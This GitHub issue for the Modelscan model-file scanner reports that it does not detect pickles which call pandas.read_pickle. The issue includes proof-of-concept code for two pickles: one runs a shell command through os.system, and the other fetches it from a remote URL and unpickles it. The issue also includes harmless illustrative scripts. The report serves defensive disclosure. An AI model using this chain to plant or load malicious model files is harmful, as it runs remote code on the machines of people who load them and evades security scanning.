Missing detection for calls to pandas.read_pickle import #269

@AndrewDzzz

Describe the bug
A pickle file can use pandas.read_pickle to download and execute a remote pickle file, and Modelscan does not detect the call.

To Reproduce
Steps to reproduce the behavior:

  1. Create a malicious pickle file and upload it to a website. Here we use GitHub as an example.
import pickle

class hack:
    def __reduce__(self):
        return __import__('os').system, ("touch /tmp/hack",)

with open("hack.pickle", "wb") as f:
    pickle.dump(hack(), f)

Then create a GitHub repository and push hack.pickle to it.

  2. Create a second pickle file whose payload calls pandas.read_pickle on the uploaded file:
import pickle

class LookGoodPickle:
    def __reduce__(self):
        return __import__('pandas').read_pickle, ("https://raw.githubusercontent.com/{your-repo}/main/hack.pickle",)

with open("LookGoodPickle.pickle", "wb") as f:
    pickle.dump(LookGoodPickle(), f)
  3. Run the Modelscan tool on the created pickle file:
    modelscan -p LookGoodPickle.pickle
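
To see which imports a pickle file references without loading it, the opcode stream can be walked with the standard library's pickletools. The sketch below is only an illustration and is not Modelscan's implementation: `referenced_globals` is a hypothetical helper, the STACK_GLOBAL handling is a heuristic that assumes the module and attribute names are the two most recent string arguments, and a harmless `json.dumps` payload stands in for pandas.read_pickle so the example needs no third-party packages.

```python
import json
import pickle
import pickletools


def referenced_globals(data):
    """Return the (module, name) pairs a pickle imports, without loading it."""
    found = set()
    strings = []  # string arguments seen so far, in order
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols 0-3: the argument is "module name" in one string.
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+: module and name were pushed as strings earlier.
            # Heuristic: assume they are the last two string arguments.
            if len(strings) >= 2:
                found.add((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class Harmless:
    # Stand-in for LookGoodPickle: the callable is benign on purpose.
    def __reduce__(self):
        return json.dumps, ({"demo": True},)


payload = pickle.dumps(Harmless(), protocol=4)
print(referenced_globals(payload))
```

Running the same helper on LookGoodPickle.pickle would list whatever module path pickle recorded for pandas.read_pickle, which is the name a scanner's unsafe list would need to match.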

Expected behavior
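Modelscan should flag LookGoodPickle.pickle as unsafe. If you pickle.load LookGoodPickle.pickle, it calls pandas.read_pickle on the URL, which downloads hack.pickle and unpickles it, so the payload in hack.pickle runs.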
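
The two-stage chain can be illustrated locally with a harmless stand-in. This is a sketch under stated assumptions, not the exploit itself: `pickle.loads` on in-memory bytes replaces pandas.read_pickle on a URL, the inner payload calls the built-in `sorted` instead of `os.system`, and the class names `Inner` and `Outer` are hypothetical.

```python
import pickle


class Inner:
    # Plays the role of hack.pickle; the callable is benign on purpose.
    def __reduce__(self):
        return sorted, ([3, 1, 2],)


inner_bytes = pickle.dumps(Inner())


class Outer:
    # Plays the role of LookGoodPickle.pickle: its only callable is a loader
    # that unpickles a second payload (here in-memory bytes, not a URL).
    def __reduce__(self):
        return pickle.loads, (inner_bytes,)


outer_bytes = pickle.dumps(Outer())

# Loading the outer pickle runs the loader, which runs the inner callable.
result = pickle.loads(outer_bytes)
print(result)  # [1, 2, 3]
```

The outer pickle's own import references name only the loader function. The inner callable appears only inside an opaque bytes argument here, and in the reported case it is not in the scanned file at all, because it is fetched at load time.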

Environment (please complete the following information):

  • OS [e.g. macOS 14.5 (Intel)]
  • Modelscan Version [e.g. v0.84]
  • Describe the model serialization format that triggered this error (if applicable): Pickle

Additional context
We recommend flagging pandas.read_pickle as unsafe, because it can fetch and unpickle a file from an arbitrary URL, and almost every machine learning environment has pandas installed.
